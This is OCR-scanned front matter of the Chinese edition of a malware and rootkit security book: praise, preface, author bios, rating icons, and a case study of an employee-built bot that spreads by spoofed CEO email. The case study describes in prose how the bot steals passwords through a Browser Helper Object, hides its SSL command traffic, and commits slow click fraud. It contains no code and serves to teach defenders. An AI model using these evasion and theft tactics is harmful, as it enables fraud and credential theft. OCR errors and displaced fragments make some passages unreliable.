对 本 书 第 1 版 的 赞誉 


“本 书 是 《黑客 曝光 》 系 列 的 最 新 成 员 ， 它 不 是 傻瓜 书 但 易于 理解 ， 是 该 系列 丛书 成 为 畅销 安全 书籍 的 极 好 诠释 。 系 统管 理 
员 和 普通 的 计算 机 用 户 都 可 能 需要 面 对 成 熟 而 隐秘 的 现代 恶意 软件 ， 本 书 客观 而 清晰 地 揭示 了 这 些 威胁 。 " 


一 一 Brian Krebs，《 华 盛 顿 邮 报 》 记 者 和 《Secutity Fix》 博 客 作 者 
“本 书 揭示 了 恶意 软件 可 能 的 藏身 之 地 ， 给 出 了 寻找 它们 的 方法 。 " 
一 一 Dan Kaminsky，IOActive 公 司 渗透 测试 负责 人 


“作者 用 常见 的 术语 和 相关 的 实例 说 明了 恶意 软件 这 一 计算 机 安全 中 深奥 而 具有 多 样 性 的 问题 。 恶 意 软 件 是 一 种 极端 危险 的 
黑客 工具 。 作 者 坦率 地 摘 述 恶意 软件 ， 以 简单 明了 的 技术 洞察 力 说 明 其 能 力 。 本 书 内 容 很 容易 理解 ， 即 使 博学 的 读者 也 能 从 中 受 
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—— Christopher Jordan, McAfee Threat Intelligence 4], %4, DHS Botnet Research £4 


“记得 期 末 复 习 的 时 候 吗 ”指导 老师 重 温 整 个 学 期 所 学 到 的 所 有 重要 问题 ， 使 你 能 够 理解 所 有 关键 点 ， 而 又 为 你 自己 的 钻研 
留 下 足够 的 参考 。 本 书 采 用 了 和 老师 类 似 的 做 法 ! 本 书 对 新 手 和 安全 专家 来 说 都 是 优秀 的 参考 书 ， 它 不 仅 对 所 介绍 的 主题 进行 了 
详细 解释 ， 而 且 不 会 因为 提供 过 多 的 信息 而 使 安全 新 手 畏 缩 不 前 。 " 





Ron Dodge， 美 军 中 校 


“本 书 提供 了 对 恶意 软件 和 Rootkit 背 景 技术 的 独特 视角 ， 如 果 你 负责 计算 机 的 安全 ， 马 上 阅读 本 书 吧 ! “ 





Matt Conover, Symantec Research Labs 高 级 主任 软件 工程 师 


在 今天 的 互联 网 上 ， 有 恶意 软 件 的 出 现 似乎 永 无 止境 ， 其 复杂 度 每 分 钟 都 在 增加 。 威 胁 研究 社区 和 安全 行业 在 先进 恶意 软件 防 
御 的 奇 刻 要 求 下 苦 苦 挣扎 ， 这 是 因为 这 一 特殊 专业 上 的 人 才 十 分 短缺 。 多 年 以 来 ， 我 们 见证 了 防 病毒 解决 方案 一 直 很 保守 ， 直 到 
不 久 前 ， 我 们 才 发 现 了 一 些 转变 ， 真 正 重 视 先 发 制 人 地 对 抗 威 胁 。 解 决 这 个 问题 的 尝试 之 一 是 承认 可 伸缩 知识 转移 是 至 天 重要 
的 ,这 也 是 本 书 的 由 来 …… 


几 年 来 ， 我 有 幸 和 Christopher Elisan 在 一 个 威胁 研究 团队 中 共事 ， 多 年 来 我 们 一 直 保 持 着 联系 。 他 对 网 络 威胁 来 源 开发 的 
开创 性 武器 有 着 渊博 的 知识 ， 在 此 基础 上 表现 出 了 超 强 的 逆向 工程 和 恶意 软件 分 析 才 能 。 从 第 1 章 起 ， 本 书 直 奔 主题 ， 然 后 以 快 
速 、 稳 定 的 节奏 ， 引 领 读 者 阅读 精心 编写 的 教程 。Christopher 以 尊重 、 信 和 任 读者 聪明 才智 和 能 力 的 方式 ， 表 达 了 他 对 于 这 一 主 
题 的 信心 。 对 于 本 书 第 2 版 的 出 版 ， 我 倍 感激 动 ， 因 为 这 本 书 的 内 容 成 功 地 融合 了 大 量 深入 的 主题 ， 同 时 介绍 了 多 种 深思 熟 虑 的 
扩展 应 用 ， 帮 助 读者 建立 针对 某 些 最 先进 的 技术 威胁 的 主动 对 策 。 


不 管 你 是 刚刚 开始 着 手 恶意 软件 的 研究 ， 还 是 这 一 领域 的 老兵 ， 在 读 完 本 书 之 后 都 会 感到 满意 ， 因 为 你 可 以 得 到 独特 而 切 题 


的 深刻 见解 ， 这 将 大 大 提高 你 在 这 一 领域 的 成 就 。 
我 要 真诚 、 自 豪 地 对 读者 们 说 ， 好 好 享受 本 书 带 来 的 一 切 吧 ! 
Lance James 


Flashpoint 首 席 科 学 家 


《黑客 曝光 : 恶意 软件 和 Rootkit 安 全 》 第 1 版 出 版 已 经 6 年 ， 在 此 期 间 ， 安 全 业界 和 黑客 社区 之 间 的 “军备 竞赛 ” 仍 在 激烈 
地 进行 ， 如 何 做 好 准备 ， 去 迎接 各 种 安全 威胁 的 挑战 呢 ? 广 大 读者 都 期 盼 着 本 书 的 全 面 更 新 。 


操作 系统 和 安全 软件 的 全 面 升 级 确实 在 一 定 程度 上 缓解 了 传统 恶意 软件 的 威胁 ，Windows10 的 推出 使 微软 操作 系统 逐渐 摆 
脱 了 “最 不 安全 系统 ”的 恶名 ， 反 观 对 手 ， 恶 意 软件 和 Rootkit 似 乎 没有 太 多 的 新 概念 ， 我 们 可 以 高 枕 无 忧 了 吗 ? 


确实 ， 恶 意 软件 和 Rootkit 这 些 年 来 在 形式 上 并 没有 太 多 的 变化 ， 但 是 在 任何 领域 都 是 “ 道 高 一 尺 ， 魔 高 一 丈 ”， 第 1 版 中 介 
绍 的 各 种 恶意 软件 仍然 可 以 “ 旧 瓶 装 新 酒 ”， 演 变 出 新 的 威胁 ， 因 此 ， 本 书 的 新 版 本 不 仅 保 留 了 第 1 版 中 丰富 的 信息 ， 而 且 介 绍 
了 许多 安全 业界 和 黑客 社区 的 新 发 展 ， 帮 助 读者 温 故 知 新 ， 更 好 地 对 抗 网 络 中 不 知名 的 对 手 。 

很 高 兴 有 机 会 再 次 翻译 本 书 ， 和 希望 新 的 版 本 能 够 为 奋战 在 网 络 安全 战线 上 的 读者 们 带 来 更 多 的 益处 ， 也 希望 广大 读者 多 提 宝 
贵 意见 ， 在 此 感谢 华章 公司 的 吴 怡 编辑 为 翻译 工作 提供 的 帮助 。 

译 者 


2017 年 6 月 


作者 简介 


Christopher C.Elisan 


Christopher C.Elisan 是 安全 行业 的 老兵 ，20 世 纪 90 年 代 从 学 校 毕 业 时 就 投身 于 这 一 职业 。 他 是 经 验 丰 富 的 逆向 工程 和 恶意 
软件 研究 人 员 。 从 DOS 时 代 到 现在 ， 他 见证 了 日 益 复 杂 精 密 的 恶意 软件 开发 。 他 目前 是 EMS 安 全 分 布 一 一 RSA 的 首席 恶意 软件 
科学 家 和 恶意 软件 情报 团队 高 级 经 理 。 


Elisan 是 Trend Micro 的 TrendLabs 实 验 室 的 先驱 之 一 ， 在 那里 他 以 恶意 软件 逆向 工程 人 员 的 身份 开始 了 职业 生涯 。 在 
TrendLabs， 他 曾经 担任 过 多 个 技术 和 管理 职位 。 离 开 Trend Micro 之 后 ，Elisan 加 入 F-Secure， 建 立 了 F-Secure 的 亚洲 研发 中 
心 ， 并 担任 多 个 项 目的 领军 人 物 ， 包 括 漏洞 发 现 、Web 安 全 和 移动 安全 。 之 后 他 加 入 了 Damballa 公 司 ， 担 任 高 级 威胁 分 析 师 ， 
专门 负责 恶意 软件 研究 。Elisan 拥 有 计算 机 工程 学 士 学 位 ， 并 通过 了 如 下 行业 认证 : 认证 道德 黑客 、 微 软 认 证 系统 工程 师 、 微 软 


认证 系统 管理 员 、 微 软 认证 专家 和 认证 敏捷 专家 。 


Elisan 是 世界 级 的 恶意 软件 、 数 字 欺 诈 和 网 络 犯罪 主题 专家 之 一 。 他 用 自己 的 专业 知识 帮助 了 不 同 的 执法 机 构 ， 并 为 领先 的 
行业 和 主流 出 版 物 提 供 关 于 恶意 软件 、 僵 尸 网 络 和 高 级 持续 性 威胁 的 专业 意见 ， 包 括 《 今 日 美国 》《 旧 金山 纪事 报 》《SC 杂 
志 》《 信 息 周 刊 》《 福 克 斯 商业 》 和 《Dark reading》。 他 还 经 常 在 全 球 的 安全 会 议 上 发 表演 讲 ， 包 括 RSA 大 会 、SecTor、 
HackerHalted、TkaeDownCon、Toorcon、 (ISC) 2 安全 会 议 、Rootcon 和 B-Sides。 他 还 是 
«Malware, Rootkits&Botnets: A Beginner’ s Guide) (McGraw-Hill 于 2012 年 出 版 ) 一 书 的 作者 。 


在 不 解剖 或 者 讨论 恶意 软件 时 ，Christopher 将 时 间 花 在 和 孩子 们 打 篮 球 和 游戏 上 。 他 和 家 人 还 喜欢 观看 亚特兰大 老 磨 队 击 
败 对 手 的 比赛 。 如 果 时 间 人 允许， 他 会 在 亚特兰大 当地 的 摇滚 乐队 担任 歌手 /吉他 手 ， 继 续 自己 的 摇滚 明星 梦 。 


你 可 以 通过 推荐 @Tophs 关 注 他 。 
Michael Davis 


Michael Davis 是 Savid Technologies 公 司 的 CEO ， 该 公司 是 一 家 全 国 性 的 技术 和 安全 咨询 公司 。 由 于 Michael 将 snort、 
ngrep、dsniff 和 honeyd 这 样 的 安全 工具 移植 到 Windows 平 台 ， 因 此 他 在 开源 软件 安全 界 声名 卓著 。 作 为 Honeynet 项 目 [1] 成 
员 ， 他 为 基于 Windows 的 honeynet (Bi) 开发 了 数据 和 网 络 控制 机 制 。Michael 还 是 sebek for Windows 的 开发 者 ， 这 是 一 
种 基于 内 核 的 honeynet 数 据 收集 和 监控 工具 。Michael 曾 经 在 领先 的 防 病毒 保护 和 漏洞 管理 企业 McAfee 公司 担任 全 球 威 
胁 高 级 经 理 ， 领 导 一 个 研究 机 密 审查 和 尖端 安全 的 团队 。 在 McAfee 工作 之 前 ，Michael 曾 在 Foundstone 工 作 过 。 





Sean Bodmer, CISSP, CEH 


Sean Bodmer#Savid Corporation 公 司 的 政府 项 目 主管 。Sean 是 一 位 活跃 的 honeynet 研 究 人 员 ， 精 于 分 析 有 恶意 软件 和 攻 
击 者 的 特征 、 模 式 和 行为 。 最 为 引 人 注 目的 是 ， 他 人 花费 了 多 年 的 时 间 来 领导 高 级 入 侵 检 测 系统 (honeynet) 的 运作 和 分 析 ， 这 
一 系统 能 够 捕捉 和 分 析 入 侵 者 及 其 工具 的 动机 和 目的 ， 从 而 生成 对 进一步 保护 用 户 网 络 有 价值 的 信息 。 在 过 去 的 10 年 中 ，Sean 
已 经 为 华盛顿 特区 的 多 个 联邦 政府 机 构 和 私人 公司 负责 过 各 种 系统 安全 工程 。Sean 在 全 美国 的 业界 会 议 ， 如 DEFCON、 
PhreakNIC、DC3、NW3C、Carnegie Mellon CERT 和 Pentagon 安 全 论坛 上 发 表 过 演讲 ， 主 题 包括 对 攻击 特征 和 攻击 者 的 剖 
析 ， 这 些 剖析 能 够 帮助 识别 网 络 攻击 的 真正 动机 和 意图 。 


Aaron LeMasters, CISSP, GCIH, CSTP 


Aaron LeMasters (乔治 -华盛顿 大 学 理科 硕士 ) 是 一 位 精通 计算 机 取证 、 恶 意 软 件 分 析 和 漏洞 研究 的 安全 研究 人 员 。 他 在 
职业 生涯 的 头 5 年 用 在 保护 不 设防 的 国防 部 网 络 上 ， 现 在 他 是 Raytheon SI 的 高 级 软件 工程 师 。Aaron 乐 于 在 大 的 安全 会 议 (如 
Black Hat) 和 较 小 的 区 域 黑客 会 议 (如 Outerzone) 上 分 享 研究 成 果 。 他 更 愿意 关注 与 Windows 内 部 构件 、 系 统 完整 性 、 逆 向 
工程 和 恶意 软件 分 析 相 关 的 高 级 研究 和 开发 问题 。 他 是 一 位 热心 的 原型 构造 者 ， 很 喜欢 开发 增强 其 研究 趣味 性 的 工具 。 在 业余 时 
间 ，Aaron 喜 欢 打 篮球 、 画 素描 、 摆 弄 他 的 Epiphone Les Paul 电 吉他 ， 以 及 和 妻子 一 起 去 纽约 旅行 。 


贡献 者 Jason Lord 
Jason Lord 目 前 是 d3Services 的 COO， 该 公司 是 提供 网 络 安全 解决 方案 的 顾问 公司 。Jason 在 过 去 14 年 中 都 活跃 于 信息 安 


全 领域 ， 主 要 关注 计算 机 取证 、 事 故 响应 、 企 业 安全 、 渗 透 测试 和 恶意 代码 分 析 。 在 这 段 时 间 里 ，Jason 应 对 过 全 球 数 百 个 计算 
机 取证 和 事故 响应 案例 。 他 还 是 高 技术 犯罪 调查 学 会 (HTCIA) 、InfraGard 和 国际 系统 安全 学 会 (1SSA) 的 活跃 成 员 。 


技术 编辑 Jong Purisima 
Jong Purisima 从 1995 年 第 一 次 分 析 恶 意 软件 起 就 从 事 威胁 和 恶意 软件 研究 工作 。 从 职业 上 说 ， 他 是 从 加 入 Trend Micro 的 


病毒 医生 团队 开始 与 计算 机 行业 的 杀 密 接触 的 ， 在 该 团队 中 ， 他 分 析 有 恶意 软件 以 生成 检测 、 补 救 措施 和 面向 客户 的 恶意 软件 报 
从 那 时 起 ， 他 主要 从 事 安 全 实验 室 的 运营 工作 ， 特 别 是 技术 产品 管理 ， 为 Trend Micro, Webroot, GFl-Sunbelt, Cisco 


”的 标语 下 合影 。 


He 

Ho 

和 Malwarebytes 等 公司 提供 以 威胁 为 中 心 的 安全 解决 方案 。 
息 就 会 被 捕获 并 接受 分 析 ， 这 样 


fe 


闲暇 之 余 ，Jong 忙 于 业余 手工 制作 和 木匠 活 ， 
[1] Honeynet 是 一 种 学 习 工 具 ， 是 一 个 包含 安全 缺陷 的 网 络 系统 。 当 它 受 到 安全 威胁 时 ， 入 侵 4 





就 可 以 了 解 黑客 的 一 些 情 况 。 译 者 注 


Dil} 
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感谢 你 选择 本 书 的 第 2 版 。 从 本 书 第 1 版 出 版 以 来 ， 安 全 领域 发 生 了 许多 变化 ， 本 版 将 反映 这 些 变化 和 更 新 ， 但 是 会 保留 第 1 
版 中 信息 的 历史 相关 性 为 代价 。 在 第 1 版 的 基础 上 ， 我 们 介绍 攻击 者 所 使 用 技术 的 改进 和 变化 ， 以 及 安全 研究 人 员 如 何 改变 ， 以 
尔 是 家 庭 用 


对 抗 如 今 新 型 恶意 软件 技术 和 方法 论 。 
遵循 第 1 版 的 精神 ， 我 们 将 焦点 放 在 对 抗 恶 意 软件 威胁 中 有 效 和 无 效 的 防护 手段 。 正 如 第 1 版 中 所 强调 的 ， 不 管 你 


户 还 是 全 球 百 强 企业 安全 团队 的 一 员 ， 对 恶意 软件 保持 警惕 都 会 给 你 带 来 回报 一 一 从 个 人 和 职业 上 都 是 如 此 。 


导航 


本 书 中 ， 每 种 攻击 技术 都 用 如 下 的 方法 突出 显示 : 


VAN 


@ 这 是 攻击 图 标 
。 书 中 对 每 种 攻击 都 提出 了 实用 、 恰 当 并 且 实 际 测试 过 的 解决 方案 。 


这 个 图 标 表示 某 种 恶意 软件 类 型 和 方法 ， 便 于 识别 


© 这 是 对 策 图 标 
在 这 里 介绍 修复 问题 和 将 攻击 者 拒 之 门 外 的 方法 。 

- 特别 注意 代码 列表 中 加 粗 显示 的 用 户 输 入 。 

| 每 种 攻击 都 带 有 一 个 更 新 过 的 危险 等 级 ， 这 个 等 级 的 确定 是 根据 作者 的 经 验 以 下 3 部 分 因素 得 出 的 : 


流行 性 对 活动 目标 使 用 该 攻击 方法 的 频率 ，1 表示 使 用 最 少 ，10 表示 使 用 最 广泛 


简单 性 执行 该 攻击 所 需要 的 技能 ，! 表示 需要 熟练 的 安全 编程 人 员 ，10 表示 只 要 很 少 甚至 不 需要 技能 

影响 ”成 功 执行 该 种 攻击 可 能 产生 的 危害 ， 1 表示 泄露 目标 的 普通 信息 ，10 表示 入 侵 超 级 用 户 账户 或 者 
等 价 的 情况 

危险 等 级 上 面 三 个 值 平均 后 给 出 的 总 体 危 险 等 级 
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一 一 Chtistobhet C.Elisan 


案例 研究 : 请 在 季度 会 议 之 前 进行 审核 


让 我 们 来 观察 一 个 组 织 成 为 攻击 目标 的 场景 。 周 二 下 午 3 点 20 分 ， 一 家 中 型 制造 企业 的 管理 层 的 十 位 主管 收 到 一 封 伪造 得 很 
逼真 的 电子 邮件 ， 这 封 邮 件 似乎 来 自 公 司 的 CEO ， 标 题 为 “请 在 我 们 的 会 议 之 前 进行 审核 ”， 并 且 要 求 收 信人 保存 邮件 附件 并 
且 将 文件 扩展 名 从 .zip 改 为 ,exe， 然 后 运行 该 程序 。 这 个 程序 是 用 于 周 五 的 季度 会 议 的 插件 ， 对 于 查看 会 议 中 播放 的 视频 来 说 是 必 
需 的 。CEO 在 邮件 中 提 到 ， 因 为 邮件 服务 器 的 安全 要 求 不 允许 他 发 送 可 执行 文件 ， 所 以 主管 们 必须 更 改 该 附件 名 。 





主管 们 按照 得 到 的 指令 运行 该 程序 。 那 些 存 有 疑问 的 人 看 到 他 们 的 同事 都 收 到 相同 的 邮件 ， 于 是 觉得 这 封 邮 件 肯定 是 合法 
的 。 而 且 ， 因 为 这 封 邮 件 在 这 天 较 晚 的 时 候 发 送 ， 有 些 人 直到 下 午 5 点 之 前 才 收 到 ， 他 们 没有 时 间 去 证 实 CEO 是 否 发 送 了 这 封 邮 
件 。 


邮件 的 附件 确实 是 一 个 在 每 台 机 器 上 安装 击 键 记录 程序 的 恶意 软件 。 谁 会 创建 这 个 程序 ? 他 们 的 动机 是 什么 ?让 我 们 来 认识 
这 位 攻击 者 。 


我 们 遇 到 的 攻击 者 Bob Fraudstet 是 本 地 一 家 小 公司 的 编程 人 员 。 他 主要 使 用 基于 Web 的 技术 (如 ASP.NET) 进行 编程 ， 并 制 
作 动 态 网 页 和 Web 应 用 程序 来 支持 该 公司 的 市 场 活动 。 因 为 经 济 衰退 ，Bob 刚 刚 遭 到 降 薪 ， 所 以 他 决定 获取 一 些 人 额外 的 收入 。 
Bob 访 问 Goosgle.com 搜 索 bot 程 序 和 僵尸 网 络 (botnet) ， 因 为 他 听 说 这 些 工 具 能 给 运作 者 带 来 许多 金钱 ， 认 为 这 可 能 是 赚 取 额外 


收入 的 一 个 好 的 途径 。 在 这 一 个 月 中 ， 他 加 入 了 聊天 室 ， 听 取 其 他 人 的 意见 ， 并 且 了 解 到 在 许多 在 线 论 坛 上 可 以 订购 到 bot 软 


件 ， 这 些 程序 能 够 实现 单 击 欺诈 (click fraud) 并 且 为 他 带 来 一 些 收 入 。 通 过 研究 ，Bob 知 道 大 部 分 防 病毒 软件 能 够 发 现 预 编译 的 
bot 程 序 ， 因 此 他 决定 获取 一 份 源 代码 来 编译 自己 的 bot。Bob 专 门 订购 了 一 个 通过 HTTP 上 的 SSL 与 他 租赁 的 主机 通信 的 bot 程 序 ， 
从 而 减少 了 bot 出 站 通信 被 安全 软件 拦截 的 概率 。 因 为 Bot 使 用 HTTP 上 的 SSL，bot 的 所 有 通信 流量 将 被 加 密 并 且 能 够 通过 大 部 分 
内 容 过 滤 技 术 。Bob 在 各 种 搜索 引擎 上 注册 了 广告 经 营 者 (Ad Syndicator) ， 作 为 广告 经 营 者 ， 他 将 在 自己 的 网 站 上 显示 来 自 搜 
索引 擎 的 广告 轮换 程序 (如 AdSense) 的 广告 ， 对 于 他 在 网 站 上 的 每 次 广告 单 击 ， 他 可 以 得 到 一 点 小 小 的 收入 〔( 几 分 钱 ) 。 


Bob 使 用 一 些 与 bot 一 同 订购 的 利用 程序 (exploits) ， 加 上 一 些 订 购 的 应 用 程序 级 漏洞 来 入 侵 全 世界 的 Web 服 务 器 。 使 用 标准 
的 Web 开 发 工具 ， 他 修改 了 网 站 上 的 HITML 或 者 PHP 页 面 ， 载 入 他 的 广告 经 营 用 户 名 和 密码 ， 这 样 他 的 广告 就 代替 了 网 站 自己 的 
广告 。 实 际 上 ，Bob 强 迫 他 所 破解 的 网 站 加 入 广告 经 营 ， 这 样 当 用 户 单 击 这 些 广告 时 ， 就 将 把 钱 送 给 他 ， 而 不 是 实际 的 网 站 经 营 
者 。 这 种 通过 用 户 单 击 网 站 广告 赚钱 的 方法 被 称 为 按 单 击 付费 广告 (pay-perclick，PPC) ， 是 Google 所 有 收入 的 来 源 。 


接 下 来 ，Bob 使 用 armadillo packer 软 件 打 包 恶 意 软件 ， 使 它 看 上 去 像 来 自 于 公司 CEO 〇 的 一 个 新 PowerPoint 幻 灯 片 文件 。 他 编写 
一 封 具体 的 定制 电子 邮件 ， 让 主管 们 相信 附件 是 合法 的 并 且 来 自 于 CEO。 


现在 主管 们 必须 打开 这 个 文件 。Bob 大 约 每 过 30 分 钟 就 向 他 购买 的 多 个 小 公司 的 电子 邮件 地 址 发 送 这 个 幻灯 片 的 拷贝 ， 这 个 
拷贝 实际 上 安装 了 他 所 制作 的 bot 程 序 。 因 为 Bob 曾 经 做 过 市 场 工作 ， 并 且 实 施 过 一 些 电子 邮 件 活动 ， 所 以 知道 能 够 从 互联 网 上 的 
一 个 公司 那里 很 容易 地 购买 电子 邮件 地 址 列表 。 互 联网 上 可 供 购 买 的 电子 邮件 地 址 多 得 令 人 惊讶 ，Bob 将 精力 集中 于 较 小 的 公司 
而 不 是 集团 公司 的 邮件 地 址 ， 因 为 他 知道 许多 企业 在 电子 邮件 网 关上 使 用 防 病毒 软件 ， 他 不 想 让 防 病毒 软件 供应 商 注 意 到 他 的 


bot。 


Bob 获 得 电子 邮件 地 址 的 另 一 种 方法 是 访问 小 型 企业 的 网 页 ， 提 取 或 者 猜测 主管 们 的 电子 邮件 地 址 ， 这 些 地 址 通常 可 以 在 网 
站 的 “关于 我 们 ”或 者 “企业 领导 ”部 分 找到 。 


Bob 很 聪明 ， 知 道 许多 通过 IRC 通 信 的 bot 程 序 更 容易 被 发 现 ， 所 以 他 购买 了 一 个 通过 HTTP 上 的 SSL 与 私人 租赁 主机 通信 的 
bot。 使 用 定制 的 GET 请 求 ， 这 个 bot 程 序 通过 向 他 的 Web 服 务 器 发 送 命令 和 带 有 具体 数据 的 控制 消息 来 进行 交互 。 由 于 Bob 的 bot 
程序 通过 HTTP 进 行 通信 ， 所 以 不 用 担心 所 感染 的 机 器 上 运行 的 防火 墙 阻 挡 bot 访 问 他 所 租赁 的 Web 服 务 器 ， 因 为 大 部 分 防火 墙 都 
允许 端口 443 上 的 出 站 通信 。 而 且 ， 他 也 不 用 担心 Web 内 容 过 滤 ， 因 为 传输 的 数据 看 上 去 是 无 害 的 。 另 外 ， 当 他 打算 窃取 查看 受 
害 者 公司 集团 的 PowetPoint 幻 灯 片 的 财务 数据 时 ， 只 需要 将 数据 加 密 ， 这 样 Web 过 滤 程 序 就 无 法 看 到 这 些 数 据 。 他 没有 使 用 大 量 
繁殖 的 蠕虫 来 发 布 他 的 bot， 因 此 受害 者 的 防 病毒 软件 没有 发 现 这 个 bot 的 安装 ， 因 为 防 病毒 软件 没有 这 个 bot 的 特征 码 。 


这 个 bot 程 序 一 旦 安装 ， 就 作为 一 个 浏览 器 助手 对 象 (Browser Helper Object, E O 
问 该 公司 的 所 有 常规 HTTP 通 信和 Internet Explotet 的 所 有 功能 ， 例 如 HTML 解析、 窗口 标题 以 及 访问 网 页 的 密码 字段 。 这 是 Bob 的 
bot 程 序 噢 探 发 送 到 公司 的 信用 卡 联盟 和 各 种 网 上 银行 数据 的 方法 。 这 个 bot 开 始 连接 Bob 的 bot 主 服务 器 ， 并 且 从 服务 器 上 读 取 已 
入 侵 网 站 的 列表 ， 连 接 到 这 些 网 站 开始 单 击 广告 。 


bot 程 序 接收 到 访问 连接 列表 之 后 ， 就 会 保存 这 个 列表 并 且 等 待 受 害 者 正常 使 用 Internet Explorer。 当 受害 者 浏览 CNN.com 了 
解 最 新 的 世界 时 事 时 ，bot 程 序 访 问 列 表 中 的 网 站 寻找 可 单 击 的 广告 。 这 个 bot 了 解 广告 网 络 的 工作 方式 ， 所 以 它 使 用 受害 者 实际 
查看 的 网 站 (例如 CNN.com) 的 引用 ,使 广告 的 单 击 看 上 去 像 是 合法 的 。 这 种 方法 骗 过 了 广告 公司 的 防 欺 诈 软 件 。bot 单 击 广告 
并 且 查 看 了 广告 的 登录 页 面 之 后 ， 就 转向 列表 中 的 下 一 个 链接 。 这 个 bot 使 用 的 这 种 方法 使 广告 公司 的 服务 器 中 的 日 志 看 上 去 像 
是 一 个 普通 人 查看 了 广告 ， 这 降低 了 Bob 的 广告 账户 被 标记 为 欺诈 者 以 及 他 自己 被 抓 住 的 可 能 性 。 








为 了 隐藏 自己 并 且 尽 可 能 得 到 更 多 的 收入 ，Bob 让 bot 程 序 以 较 慢 的 方式 在 几 周 内 持续 单 击 广告 。 这 能 确保 受害 者 不 会 注意 到 
计算 机 上 额外 装 入 的 程序 ，Bob 的 bot 程 序 也 就 不 会 被 发 现 是 个 欺诈 程序 。 


Bob 成 功 地 使 公司 的 工作 站 成 为 自己 的 提 款 机 ， 将 现金 吐 到 大 竺 上， 而 他 擒 着 包 去 捡 这 些 钱 。 


Bob 采 用 的 其 他 隐身 技术 确保 他 的 bot 服 务 器 用 于 查找 实际 数据 的 搜索 引擎 不 会 发 现 他 的 欺诈 。 为 了 避 开 检测 ，bot 使 用 了 各 
种 搜索 引 掌 (如 Google、Yahoo、AskJeeves 等 ) 来 实现 欺诈 。 在 欺诈 方案 中 使 用 越 多 搜索 引擎 ，Bob 就 能 赚 越 多 的 钱 。 


Bob 需 要 使 用 搜索 引擎 ， 因 为 这 是 欺诈 的 渠道 。 所 单 击 的 广告 是 前 几 个 星期 Bob 侵 入 的 网 站 上 所 放置 的 。 在 侵入 的 网 站 上 所 
单 击 的 广告 只 有 10% 来 自 Google， 其 余 的 来 自 其 他 来 源 ， 包 括 其 他 的 搜索 引擎 。bot 程 序 采 用 一 种 随机 单 击 算法 ， 这 种 算法 只 在 半 
数 时 间 中 单 击 广告 链接 ， 使 得 搜索 引擎 公司 更 难 发 现 。 


使 用 慢 速 的 方法 并 不 意味 着 Bob 需 费 很 长 的 时 间 赚 钱 。 例 如 ， 仅 仅 使 用 Google， 我 们 假设 Bob 的 秘密 传播 (例如 ， 慢 慢 
地 传播 ) 恶意 软件 感染 10000 台 机 器 ; 每 台 机 器 最 多 单 击 20 个 广告 ， 而 只 在 50% 的 时 间 内 单 击 Google 广 告 ， 一 共 单 击 100000 次 。 
我 们 再 假设 Bob 显 示 的 广告 每 个 单 击 产生 0.5 美 元 收入 。 使 用 这 种 方法 ， 攻 击 者 得 到 50000 美 元 收入 〈10000X20X50%X$.50) 。 
对 于 两 周 的 时 间 来 说 ， 这 项 工作 的 价值 很 不 错 。 


现在 我 们 理解 了 Bob 的 动机 和 计划 攻击 的 方法 ， 让 我 们 回 到 这 个 虚构 的 公司 ， 分 析 他 们 如 何 处 理 恶 意 软 件 的 爆发 。 因 为 Bob 
希望 保持 隐藏 ， 所 以 这 个 恶意 软件 一 经 运行 ， 就 通过 HTTP 上 的 SSL 向 中 心服 务 器 报告 ， 并 且 请 求 和 发 送 该 公司 员工 输入 到 网 站 
的 所 有 用 户 名 和 密码 的 副本 。 因 为 Bob 使 用 一 个 BHO 构 建 bot， 不 管 网 站 的 密码 是 否 加 密 都 能 捕获 。 包 括 员 工 的 信用 卡 联盟 和 网 
上 电子 商务 供应 商 ( 如 eBay 和 Amazon.com) 都 记录 下 来 ， 并 且 发 送 给 Bob 租 赁 的 服务 器 。 由 于 到 租赁 服务 器 的 通信 都 通过 HTTP 
上 的 SSL 进 行 ， 这 个 网 站 不 会 被 公司 的 代理 服务 器 标记 为 恶意 网 站 ， 也 不 会 被 拦截 。 


周三 上 午 8 点 ， 恶 意 软 件 通 过 将 自身 发 送 给 接收 到 相同 的 CEO 信 息 的 主管 的 企业 地 址 牌 上 的 所 有 用 户 而 传播 。 通过 利用 未 打 
补丁 的 机 器 以 及 IT 部 门 尚 未 来 得 及 更 新 的 运行 旧版 本 Microsoft Windows 的 机 器 上 的 网 络 漏洞 ， 这 个 恶意 软件 开始 感染 其 他 机 器 
为 什么 CIO 不 批准 网 络 安全 团队 去 年 提出 的 计划 ， 购 买 和 实施 的 补丁 管理 呢 ? 


周三 下 午 4 点 ， 现 在 已 经 有 几 百 名 员工 的 电脑 受到 感染 ， 但 是 IT 部 门 也 听 到 了 需要 安装 电子 邮件 上 的 应 用 程序 的 消息 ， 于 是 
开始 调查 。IT 部 门 发 现 这 一 文件 可 能 是 恶意 软件 ， 但 是 企业 防 病毒 软件 和 电子 邮件 防 病毒 软件 不 能 检测 ， 所 以 还 不 能 确定 这 个 可 
执行 文件 是 什么 。IT 部 门 对 于 这 个 执行 程序 是 否 恶意 、 程 序 的 意图 或 者 恶意 软件 的 操作 情况 没有 任何 信息 ， 他 们 相信 安全 软件 供 
应 商 ， 将 样本 发 送 给 防 病毒 软件 供应 商 进 行 分 析 。 


周 四 上 午 10 点 ，IT 部 门 急 急忙 忙 地 开始 试图 使 用 防 病毒 供应 商 前 一 晚上 发 送 的 特殊 特征 码 删 除 这 个 病毒 。 这 是 个 猫 捉 老鼠 
的 游戏 ，IT 部 门 很 少 能 够 在 病毒 蔓延 之 前 采取 行动 。IT 部 门 在 前 一 个 晚上 关闭 公司 的 所 有 工作 站 ， 包 括 那 些 架 设 在 伦敦 的 、 该 制 
造 公司 必需 的 订单 处 理 机 ， 这 使 客户 很 不 高 兴 。 


周 四 晚上 8 点 ，IT 部 门 仍 然 在 试图 为 工作 站 杀毒 。 一 位 IT 工 作 人 员 开 始 自 己 进行 分 析 ， 并 且 发 现 这 段 二 进 制 代码 可 能 是 一 位 
过 去 的 员工 编写 的 ， 因 为 二 进 制 代码 中 的 一 些 字符 串 引 用 了 前 任 CIO 和 IT 部 门 负 责 人 之 间 的 一 次 争吵 。IT 部 门 联络 FBI 确 定 这 是 
不 是 一 次 犯罪 行动 。 


周 五 上 午 9 点 ， 季 度 会 议 按照 计划 应 该 开始 ， 但 是 因为 CEO 用 来 做 报告 的 机 器 也 受到 感染 ， 在 IT 部 门 推出 新 的 防 病毒 软件 更 
新 时 该 机 器 关闭 着 ， 导 致 病毒 尚未 被 清除 ， 所 以 会 谈 只 能 推迟 。CEO 要 求 和 CIO 进 行 一 次 紧急 会 谈 以 确定 发 生 了 什么 事情 。 工 部 


门 继续 进行 网 络 杀 毒 并 且 稳 步 推进 工作 。 





